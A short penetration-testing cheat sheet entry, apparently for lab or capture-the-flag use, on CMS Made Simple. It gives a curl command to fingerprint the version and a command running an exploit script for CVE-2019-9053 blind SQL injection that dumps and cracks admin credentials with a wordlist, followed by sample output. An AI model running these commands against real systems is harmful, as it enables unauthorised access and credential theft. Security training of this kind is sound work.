CMS Made Simple
What it is: Lightweight CMS for small websites. Known for a blind SQL injection vulnerability in versions below 2.2.10 that dumps admin credentials.
Default ports: 80, 443
Vuln research:
Identify version
Check /doc/CHANGELOG.txt — Version determines SQLi availability
curl -s http://$IP/doc/CHANGELOG.txt | head -10
SQLi (CVE-2019-9053)
Blind SQLi on CMS Made Simple < 2.2.10 — Dumps admin credentials
python3 cmsms_sqli.py -u http://$IP/ --crack -w /usr/share/wordlists/rockyou.txt
Example Output
[+] Salt for password found: xxxxxxxx
[+] Username found: admin
[+] Email found: admin@site.com
[+] Password found: SuperSecret